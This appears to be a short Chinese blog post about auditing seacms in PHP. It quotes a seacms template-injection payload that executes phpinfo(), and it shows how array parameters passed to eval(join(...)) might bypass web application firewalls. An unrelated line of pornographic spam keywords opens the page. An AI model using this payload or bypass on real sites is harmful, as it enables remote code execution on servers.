亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

為了賬號安全,請及時綁定郵箱和手機立即綁定

php通過http請求發送數組

標簽:
PHP

最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点

1searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

9[]=ph&9[]=pinfo();

就尝试了一下,发现在接收数据时,例:

键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此

服务器端测试代码

<?php
    print_r($_GET[1]);
?>


测试结果如下

https://img1.sycdn.imooc.com//5b07bd540001f65304590220.jpg


那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果

提供一个简单思路

服务器测试代码

<?php
    eval(join($_GET[123]));
?>


测试结果如下

https://img1.sycdn.imooc.com//5b07bd7300011da805970079.jpg


错误之处,敬请指正

點擊查看更多內容
TA 點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優質文章

正在加載中
  • 推薦
  • 評論
  • 收藏
  • 共同學習,寫下你的評論
感謝您的支持,我會繼續努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學

大額優惠券免費領

立即參與 放棄機會
微信客服

購課補貼
聯系客服咨詢優惠詳情

幫助反饋 APP下載

慕課網APP
您的移動學習伙伴

公眾號

掃描二維碼
關注慕課網微信公眾號

舉報

0/150
提交
取消